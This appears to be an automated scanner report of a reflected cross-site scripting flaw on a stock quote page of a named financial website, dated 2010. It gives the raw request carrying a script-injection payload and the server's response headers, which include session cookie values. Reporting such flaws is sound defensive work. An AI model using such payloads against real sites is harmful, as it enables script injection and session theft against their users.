1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.zacks.com |
Path: | /stock/quote/LLTC |
GET /stock/quote/LLTC?4dff2"><script>alert(1)< Host: www.zacks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 16:50:25 GMT Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 PHP/5.2.5 X-Powered-By: PHP/5.2.5 Set-Cookie: PHPSESSID=qsnfsql3ie Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Set-Cookie: user_session=376cf83 Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Last-Modified: Tue, 16 Nov 2010 16:50:25 GMT Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Set-Cookie: user_session=376cf83 Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Set-Cookie: user_session=376cf83 Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Set-Cookie: user_session=376cf83 Set-Cookie: CUSTOMER_ID=deleted; expires=Mon, 16-Nov-2009 16:50:24 GMT; path=/; domain=.zacks.com Set-Cookie: cf60519feb1344e434b8 Set-Cookie: d7b03438c81f22c0f9dc Set-Cookie: d7b03438c81f22c0f9dc Connection: close Content-Type: text/html Content-Length: 93044 <!-- DC_PAGE_ID: 22, ADID: --><html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <meta http-equiv="content <meta name="descri ...[SNIP]... <a href="/my_account/forgot ...[SNIP]... |